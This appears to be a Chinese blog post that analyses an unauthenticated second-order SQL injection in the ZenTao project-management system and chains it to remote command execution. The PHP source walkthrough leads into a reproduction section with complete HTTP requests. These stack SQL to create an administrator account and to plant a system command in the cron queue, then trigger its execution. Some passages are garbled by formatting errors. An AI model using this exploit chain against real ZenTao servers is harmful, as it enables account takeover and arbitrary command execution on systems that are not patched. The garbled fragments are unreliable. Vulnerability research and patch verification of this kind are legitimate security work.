SQL注入到RCE漏洞

最新推荐文章于 2025-04-02 20:48:55 发布

阿宝分享技术

最新推荐文章于 2025-04-02 20:48:55 发布

阅读量862

点赞数 20

文章标签： sql android 数据库 RCE

本文链接：https://blog.youkuaiyun.com/Libao657/article/details/145155238

版权

漏洞简介
禅道20.2版本以下在个性化设置功能上存在一个未授权sql注入，这注入通过堆叠注入到数据库zt_config表中，将添加后台管理员到zt_user和注入命令执行的定时任务到zt_queue表中，最终实现未授权RCE的效果。
影响版本
18.0.beta1<=version<=18.13.stable 、

20.0.beta1<=version<20.2 、

17.0.beta1<=version<=17.8

以及16.5版本受影响。

漏洞原理分析
3.1 my::preference()注入点
/zentao/module/my/control.php（my类）的preference方法能够没有限制注入的key参数和参数值内容。loadModel(‘setting’)表示加载/module/setting/的model.php文件。

public function preference(string $showTip = ‘true’)

{
```
 $this\->loadModel('setting');

 if($\_POST)

 {   //e.g. system.common.safe.changeweak

     //根据zt\_config表??.common.?.?

     foreach($\_POST as $key \=> $value) $this\->setting\->setItem("{$this\->app\->user\->account}.common.$key", $value);
     $this\->setting\->setItem("{$this\->app\->user\->account}.common.preferenceSetted", 1);
  return $this\->send(array('result' \=> 'success', 'message' \=> $this\->lang\->saveSuccess, 'closeModal' \=> true));

 }

 $this\->view\->title      \= $this\->lang\->my\->common . $this\->lang\->hyphen . $this\->lang\->my\->preference;

 $this\->view\->showTip    \= $showTip;

 $this\->view\->URSRList         \= $this\->loadModel('custom')\->getURSRPairs();

 $this\->view\->URSR             \= $this\->setting\->getURSR();

 $this\->view\->programLink      \= isset($this\->config\->programLink)   ? $this\->config\->programLink   : 'program-browse';

 $this\->view\->productLink      \= isset($this\->config\->productLink)   ? $this\->config\->productLink   : 'product-all';

 $this\->view\->projectLink      \= isset($this\->config\->projectLink)   ? $this\->config\->projectLink   : 'project-browse';

 $this\->view\->executionLink    \= isset($this\->config\->executionLink) ? $this\->config\->executionLink : 'execution-task';

 $this\->view\->preferenceSetted \= isset($this\->config\->preferenceSetted) ? true : false;

 $this\->display();
```
}
没有对$_POST过滤，循环遍历获取参数和参数值，其中参数当作key，参数值当作value，分别传入setting模块model.php（settingModel类）的setItem方法。

public function setItem(string $path, mixed $value = ‘’): bool

{
```
 $item \= $this\->parseItemPath($path);

 if(empty($item)) return false;

 $item\->value \= strval($value);//value没有过滤，直接赋值。

 $this\->dao\->replace(TABLE\_CONFIG)\->data($item)\->exec();

 return !dao::isError();
```
}
$i t e m - > v a l u e = s t r v a l ($ value);显示value没有过滤，直接赋值。而key会经过parseItemPath处理。 $t hi s - > a pp - > u ser 从 sess i o n 获取，没登陆情况下$ this->app->user->account为null。

public function parseItemPath(string $path): object|bool
{
```
 /\* Determine vision of config item. \*/

 $pathVision \= explode('@', $path);

 $vision     \= isset($pathVision\[1\]) ? $pathVision\[1\] : '';

 $path       \= $pathVision\[0\];

 /\* fix bug when account has dot. \*/

 $account \= isset($this\->app\->user\->account) ? $this\->app\->user\->account : '';

 $replace \= false;

 if($account and strpos($path, $account) \=== 0)
 {

     $replace \= true;

     $path    \= preg\_replace("/^{$account}/", 'account', $path);

 }

 $level   \= substr\_count($path, '.');//几层

 $section \= '';

 if($level <= 1) return false;

 if($level \== 2) list($owner, $module, $key) \= explode('.', $path);

 if($level \== 3) list($owner, $module, $section, $key) \= explode('.', $path);

 if($replace) $owner \= $account;

 $item \= new stdclass();

 $item\->owner   \= $owner;

 $item\->module  \= $module;

 $item\->section \= $section;

 $item\->key     \= $key;

 if(!empty($vision)) $item\->vision \= $vision;

 return $item;
```
}
配合setItem方法replace的TABLE_CONFIG（zt_config)格式可以查看到数据表的结构，由此可以得知parseItemPath处理{ $KaTeX parse error: Expected 'EOF', got '}' at position 25: \dots->user->account}̲.common.$ key和value的过程。只能控制数据库中最后两列key和value，前面vison、owner和section均为空。

img

外部数据处理完毕后经过传入zentao/lib/dao/dao.class.php（Dao类）的data()会转义单引号，后续跟进如下：

//zentao/lib/dao/dao.class.php[Dao::data()]
public function data($data, $skipFields = ‘’)
{

    global $app, $config;

    if(!is\_object($data)) $data \= (object)$data;

    if(get\_class($data) \== 'form') $data \= $data\->data;

    if(isset($config\->bizVersion))

    {

        $app\->loadLang('workflow');

        $app\->loadConfig('workflow');

        /\* Check current module is buildin workflow. \*/

        if(isset($config\->workflow\->buildin\->modules))
        {

            $currentModule \= $app\->fetchModule ?: $app\->rawModule;

            foreach($config\->workflow\->buildin\->modules as $appModules)
            {

                if(!empty($appModules\->$currentModule))
                {

                    $currentMainTable \= zget($appModules\->$currentModule, 'table', '');

                    break;

                }

            }

            if(isset($currentMainTable))
            {

                if($currentMainTable \== $this\->table)
                {
                    $data \= $this\->processData($data);

                }
                else
                {

                    $workflowFields \= array();

                    $stmt \= $this\->dbh\->query("SELECT \`field\`,\`type\` FROM " . TABLE\_WORKFLOWFIELD . " WHERE \`module\` = '{$currentModule}' AND \`buildin\` = '0'");

                    while($row \= $stmt\->fetch())

                    {

                        $workflowFields\[$row\->field\] \= $row\->type;

                    }

                    $fields \= $this\->getFieldsType();

                    foreach($data as $field \=> $value)
                    {

                        if(!isset($fields\[$field\]) && isset($workflowFields\[$field\])) unset($data\->$field);

                    }

                }

            }

        }

    }

    $skipFields .\= ',uid';

    return parent::data($data, $skipFields);

}

//zentao/lib/base/dao/dao.class.php[baseDao::data()]

public function data($data, $skipFields \= '')
{
    if(!is\_object($data)) $data \= (object)$data;

    if($this\->autoLang and !isset($data\->lang))
    {

        $data\->lang \= $this\->app\->getClientLang();

        if(isset($this\->app\->config\->cn2tw) and $this\->app\->config\->cn2tw and $data\->lang \== 'zh-tw') $data\->lang \= 'zh-cn';

        if(defined('RUN\_MODE') and RUN\_MODE \== 'front' and !empty($this\->app\->config\->cn2tw)) $data\->lang \= str\_replace('zh-tw', 'zh-cn', $data\->lang);

    }

    $this\->sqlobj\->data($data, $skipFields);

    return $this;

}

//zentao/lib/base/dao/dao.class.php[baseSQL::data()]
public function data($data, $skipFields = ‘’)

{

    $data \= (object) $data;

    if($skipFields) $this\->skipFields \= ',' . str\_replace(' ', '', $skipFields) . ',';

    if($this\->method != 'insert')
    {

        foreach($data as $field \=> $value)
        {

            if(!preg\_match('|^\\w+$|', $field))
            {

                unset($data\->$field);

                continue;

            }

            if(strpos($this\->skipFields, ",$field,") !== false) continue;

            if($field \== 'id' and $this\->method \== 'update') continue;     // primary key not allowed in dmdb.

            $this\->sql .\= "\`$field\` = " . $this\->quote($value) . ',';

        }

    }

    $this\->data \= $data;

    $this\->sql  \= rtrim($this\->sql, ',');    // Remove the last ','.

    return $this;

}

跟进quote()方法发现quote只会转义单引号，斜线和反斜线不会：

public function quote($value)

{

    if(is\_null($value)) return 'NULL';

    if($this\->magicQuote) $value \= stripslashes($value);

    return $this\->dbh\->quote((string)$value);

}

data处理完毕后就返回exec执行sql语句了，从而将外部数据保存到数据库zt_config中。

3.2 commonModel::loadConfigFromDB()和router::setControlFile触发点
由于这是一个二次注入，因此找触发点第二步从漏洞原理出发：

代码逻辑从table_config获取数据，然后拼接到不论哪个表的where条件中，并且增删改查等sql语句**（不能经过链式操作函数，因此这些函数都会转义承接的数据过滤加入quotes）**。

查找思路要么找第一步table_config数据表获取数据select的*/value，要么找第二步直接拼接where条件的sql语句。

从第一步查找正则select[^\r\n]+_config搜索，结合zt_config表拥有的字段和注入点可排除的条件有：owner、section、vision为空、module为common、key和value可控可任意设置。

一共找到以下几处：

baseRouter::setVision()方法
该处 $a cco u n t 可控，但是添加了 v a l i d a t er :: c h ec k A cco u n t ($ account)，该处存在历史漏洞CNVD-2022-42853

在这里插入图片描述
跟进发现该处符合要求，但是该函数内部只有获取zt_config数据，没有将获取的数据进行再次的sql语句操作，因此仅此不能完全触发。

public function getSysAndPersonalConfig(string $account = ‘’): array
{

    $owner   \= 'system,' . ($account ? $account : '');

    $records \= $this\->dao\->select('\*')\->from(TABLE\_CONFIG)

        \->where('owner')\->in($owner)

        \->beginIF(!$this\->app\->upgrading)\->andWhere('vision')\->in(array('', $this\->config\->vision))\->fi()

        \->orderBy('id')

        \->fetchAll('id');

    if(!$records) return array();

    $vision \= $this\->config\->vision;
 /\* Group records by owner and module. \*/

    $config \= array();

    foreach($records as $record)
    {

        if(!isset($config\[$record\->owner\])) $config\[$record\->owner\] \= new stdclass();

        if(!isset($record\->module)) return array();    // If no module field, return directly. Since 3.2 version, there's the module field.

        if(empty($record\->module)) continue;

        /\* If it\`s lite vision unset config requiredFields \*/

        if($vision \== 'lite' and $record\->key \== 'requiredFields' and $record\->vision \== '') continue;

        $config\[$record\->owner\]\->{$record\->module}\[\] \= $record;

    }
    return $config;
}

寻找调用settingModel::getSysAndPersonalConfig()方法的地方，完成触发。

在这里插入图片描述
只有一处commonModel::loadConfigFromDB()方法对其调用，其中$account刚好未登陆的情况下为空。

public function loadConfigFromDB()
{

    /\* Get configs of system and current user. \*/

    $account \= isset($this\->app\->user\->account) ? $this\->app\->user\->account : '';

    if($this\->config\->db\->name) $config \= $this\->loadModel('setting')\->getSysAndPersonalConfig($account);

    $this\->config\->system   \= isset($config\['system'\]) ? $config\['system'\] : array();

    $this\->config\->personal \= isset($config\[$account\]) ? $config\[$account\] : array();//$config\[""\]

    $this\->commonTao\->updateDBWebRoot($this\->config\->system);

    /\* Override the items defined in config/config.php and config/my.php. \*/

    if(isset($this\->config\->system\->common))   $this\->app\->mergeConfig($this\->config\->system\->common, 'common');

    if(isset($this\->config\->personal\->common)) $this\->app\->mergeConfig($this\->config\->personal\->common, 'common');
  $this\->config\->disabledFeatures \= $this\->config\->disabledFeatures . ',' . $this\->config\->closedFeatures;

}

从zt_config获取的数据return存储到 $co n f i g ，继续$ config[ $a cco u n t] ($ config[“”])传递给$this->config->personal->common（个人用户common配置），在第20行调用baseRouter::mergeConfig()操作。

public  function mergeConfig(array $dbConfig, string $moduleName \= 'common')
{

    global $config;

    /\* 如果没有设置本模块配置，则首先进行初始化。Init the $config->$moduleName if not set.\*/

    if($moduleName != 'common' and !isset($config\->$moduleName)) $config\->$moduleName \= new stdclass();

$config2Merge = $config;

    if($moduleName != 'common') $config2Merge \= $config\->$moduleName;

foreach($dbConfig as $KaTeX parse error: Expected '}', got 'EOF' at end of input: \dots if($ item->section)

        {

            if(!isset($config2Merge\->{$item\->section})) $config2Merge\->{$item\->section} \= new stdclass();

            if(is\_object($config2Merge\->{$item\->section}))
            {

                $config2Merge\->{$item\->section}\->{$item\->key} \= $item\->value;

            }
        }
        else
        {

            $config2Merge\->{$item\->key} \= $item\->value; // 根据代码逻辑得知，从数据库的配置存储到

        }

    }

}

$co n f i g 2 M er g e 承接代码中全局变量$ config原本值，然后再添加数据库的common配置。

寻找调用commonModel::loadConfigFromDB()的地方：在这里插入图片描述
其中有一个在同类下setUserConfig()有调用，该类在路由分析中知道是禅道整体路由默认会访问加载的，所以该方法只要访问任何路由都会有获取数据库config。但这里还没有找到将获取的数据存到sql操作中，直接根据第二步触发的正则['"][^{\r\n>]+where[}\r\n]+$查找。

首先在module和framework目录中查找：

在这里插入图片描述
router::setControlFile()在if else分支里面 $this->config->vision直接拼接zt_workflowaction。刚好$ this->config->vision可以经过数据库commonModel::loadConfigFromDB()覆盖到代码config中。为了能进入if else分支， $t hi s - > co n f i g - > e d i t i o n 默认是 o p e n （在 co n f i g / co n f i g . p h p 可以查看开源版本是这样，旗舰版或商业版则不存在是这个问题），需要通过注入点覆盖。同时$ this->moduleName需要从zt_workflowaction选任意一个存在的module即可，method调用方法任意写，但是不能写browselabel。

public function setControlFile($exitIfNone \= true)
{
    /\* Set raw module and method name for fetch control. \*/

    if(empty($this\->rawModule)) $this\->rawModule \= $this\->moduleName;

    if(empty($this\->rawMethod)) $this\->rawMethod \= $this\->methodName;

    /\* If is not a biz version or is in install mode or in in upgrade mode, call parent method. \*/

    if($this\->config\->edition \== 'open' or $this\->installing or $this\->upgrading) return parent::setControlFile($exitIfNone);

    /\* Check if the requested module is defined in workflow. \*/

    $flow \= $this\->dbQuery("SELECT \* FROM " . TABLE\_WORKFLOW . " WHERE \`module\` = '$this\->moduleName'")\->fetch();

    if(!$flow) return parent::setControlFile($exitIfNone);

    if($flow\->status != 'normal') helper::end("<html><head><meta charset='utf-8'></head><body>{$this\->lang\->flowNotRelease}</body></html>");

    if($flow\->buildin && $this\->methodName \== 'browselabel')

    {

        $this\->rawModule \= $this\->moduleName;

        $this\->rawMethod \= 'browse';

        $this\->isFlow    \= true;

        $moduleName \= 'flow';

        $methodName \= 'browse';

        $this\->setFlowURI($moduleName, $methodName);

    }
    else
    {

        $action \= $this\->dbQuery("SELECT \* FROM " . TABLE\_WORKFLOWACTION . " WHERE \`module\` = '$this\->moduleName' AND \`action\` = '$this\->methodName' AND \`vision\` = '{$this\->config\->vision}'")\->fetch();

        if(zget($action, 'extensionType') \== 'override')

        {

            $this\->rawModule \= $this\->moduleName;

            $this\->rawMethod \= $this\->methodName;

            $this\->isFlow    \= true;

            $this\->loadModuleConfig('workflowaction');

            $moduleName \= 'flow';

            $methodName \= $this\->methodName;

            if(!in\_array($this\->methodName, $this\->config\->workflowaction\->default\->actions))
            {

                if($action\->type \== 'single') $methodName \= 'operate';

                if($action\->type \== 'batch')  $methodName \= 'batchOperate';

            }

            $this\->setFlowURI($moduleName, $methodName);

        }

    }
return parent::setControlFile($exitIfNone);

}

触发点涉及到禅道路由，这部分需要结合禅道路由整体分析理解。

3.3 定时任务后台RCE
cron::ajaxExec()是执行定时任务的方法，$this->config->global->cron默认从zt_config可以看到设置为1。访问该方法需要在applyExecRoles()判断当前用户是否有权限执行定时任务、判断当前时间是否大于上次执行任务的时间，否则不能执行任务。

public function ajaxExec(bool $restart \= false)
{

    if(empty($this\->config\->global\->cron)) return; //默认不为空

    /\* Run as daemon. \*/

    ignore\_user\_abort(true);

    set\_time\_limit(0);

    session\_write\_close();

    $execId \= mt\_rand();

    if($restart) $this\->cron\->restartCron($execId);

    while(true)

    {

        /\* Only one scheduler and max 4 consumers. \*/

        $roles \= $this\->applyExecRoles($execId);//检测当前是否可以执行定时任务，内部逻辑是判断当前时间是否过了上一次已经执行过的时间。

        if(empty($roles))

        {

            ignore\_user\_abort(false);

            return;

        }

        if(in\_array('scheduler', $roles)) $this\->schedule($execId);//根据该方法注释为调度生成队列任务的方法

        if(in\_array('consumer', $roles))  $this\->consumeTasks($execId);//根据注释为执行所有定时任务的方法

        sleep(20);

    }

}

跟进执行定时任务的方法consumeTasks():

public function consumeTasks(int $execId)
{
while(true)

    {

        $this\->cron\->updateTime('consumer', $execId);
    /\* Consume. \*/

        $task \= $this\->dao\->select('\*')\->from(TABLE\_QUEUE)\->where('status')\->eq('wait')\->andWhere('command')\->ne('')\->orderBy('createdDate')\->fetch();

        if(!$task) break;
        $this\->consumeTask($execId, $task);

    }

}

查询TABLE_QUEUE（zt_queue）表中需要执行的任务的命令有哪些。结合代码，如下所示status为wait并且命令不为空的任务则需要执行。每次执行完成后会在consumeTask方法更新zt_queue表的execId、status、lastTime，方便下一次任务执行的对比。在这里插入图片描述
更新完毕后，将执行任务的结果不管如何（只要没有被catch）都记录到日志中，通过cronModel::logCron()方法

public function consumeTask(int $execId, object $task)
{

    /\* Other executor may execute the task at the same time，so we mark execId and wait 500ms to check whether we own it. \*/

    $this\->dao\->update(TABLE\_QUEUE)\->set('status')\->eq('doing')\->set('execId')\->eq($execId)\->where('id')\->eq($task\->id)\->exec();

    usleep(500);

    $task \= $this\->dao\->select('\*')\->from(TABLE\_QUEUE)\->where('id')\->eq($task\->id)\->fetch();

    if($task\->execId != $execId) return;
 /\* Execution command. \*/

    $output \= '';

    $return \= '';

    unset($\_SESSION\['company'\]);

    unset($this\->app\->company);

    $this\->loadModel('common');

    $this\->common\->setCompany();

    $this\->common\->loadConfigFromDB();

    try
    {

        if($task\->type \== 'zentao')
        {

            parse\_str($task\->command, $params);

            if(isset($params\['moduleName'\]) and isset($params\['methodName'\]))

            {

                $this\->viewType \= 'html';

                $this\->app\->loadLang($params\['moduleName'\]);

                $this\->app\->loadConfig($params\['moduleName'\]);

                $output \= $this\->fetch($params\['moduleName'\], $params\['methodName'\]);

            }

        }
        elseif($task\->type \== 'system')
        {

            exec($task\->command, $out, $return);

            if($out) $output \= implode(PHP\_EOL, $out);
        }
    }
    catch(EndResponseException $endResponseException)
    {

        $output \= $endResponseException\->getContent();

    }
    catch(Exception $e)
    {

        $output \= $e;

    }

    $this\->dao\->update(TABLE\_QUEUE)\->set('status')\->eq('done')\->where('id')\->eq($task\->id)\->exec();

    $this\->dao\->update(TABLE\_CRON)\->set('lastTime')\->eq(date(DT\_DATETIME1))\->where('id')\->eq($task\->cron)\->exec();

    $log \= date('G:i:s') . " execute\\ncronId: {$task\->cron}\\nexecId: $execId\\ntaskId: {$task\->id}\\ncommand: {$task\->command}\\nreturn : $return\\noutput : $output\\n\\n";

    $this\->cron\->logCron($log);

    return true;

}

日志文件名为cron.记录日期.log.php，日志统一路径为zentao/tmp/log/。

public function logCron(string $log)

{

    if(!is\_writable($this\->app\->getLogRoot())) return false;

    $runMode \= PHP\_SAPI \== 'cli' ? '\_cli' : '';

    $file \= $this\->app\->getLogRoot() . "cron$runMode." . date('Ymd') . '.log.php';

    if(!is\_file($file)) $log \= "<?php\\n die();\\n" . $log;

    $fp \= fopen($file, "a");

    fwrite($fp, $log);

    fclose($fp);

}

漏洞复现
4.1 突破权限
根据漏洞分析得知这个二次注入，能够执行堆叠注入，再加上是个未授权SQL注入，利用该注入可添加管理员突破权限。

添加管理员用户模版payload参照zt_user用户表中admin原始用户：insert into zt_user(type,account,password,realname,pinyin)+value(‘inside’,‘xxx’,‘MD5 32位hash’,‘xxx’,‘xxxxx’);。

通过以下数据包能够添加成功账户bbba/123456：

POST /zentao/my-preference.html HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept: */*
Origin: http://x.x.x.x
Referer: http://x.x.x.x
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: lang=zh-cn; device=desktop; theme=default;
Connection: close
Content-Length: 274

edition=1&vision=1’;insert+into+zt_user(type,account,password,realname,pinyin)+value(‘inside’,‘bbba’,‘e10adc3949ba59abbe56e057f20f883e’,‘bbba’,‘bbba+b’);#/…/…/open/rnd
触发路由请求类只要是zt_workflow表中存在的module即可，请求的method方法随便写即可（除去“browselabel”以外）。

查看zt_workflow：在这里插入图片描述
选用第一个product触发。

GET /zentao/project-method.html HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: lang=zh-cn; device=desktop; theme=default; hideMenu=false; vision=rnd; tab=my;
Connection: close
触发成功后响应302，无响应体（使用浏览器的hackbar请求因为具体的方法随便写，可能会报找不到路由的错，开启了config/my.php的debug，会抛出异常和程序栈）：在这里插入图片描述
新添加的用户首次登录需要修改原始密码。

4.2 定时任务RCE
同样通过上述堆叠注入注入zt_queue执行whoami的payload的sql注入：INSERT+INTO+zt_queue(type,command,cron,createdDate,execId)+value(‘system’,‘whoami’,30,CURRENT_TIME(),123);

注入成功后，查看zt_queue表：

在这里插入图片描述
GET /zentao/cron-ajaxExec.html HTTP/1.1
Host: x.x.x.x
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: zentaosid=b5ee0caeb63360a394258d068759bad4; lang=zh-cn; vision=rnd; device=desktop; theme=default; hideMenu=false; tab=my
Connection: close
触发成功响应302：

在这里插入图片描述
命令执行结果在\app\zentao\tmp\log\目录下日志文件cron.日期.log.php可以查看：

e.g. 在cron.20241125.log.php能查看到结果。在这里插入图片描述
5. 官方修复
禅道在补丁页面发布该漏洞的修复：https://www.zentao.net/extension-viewext-6.html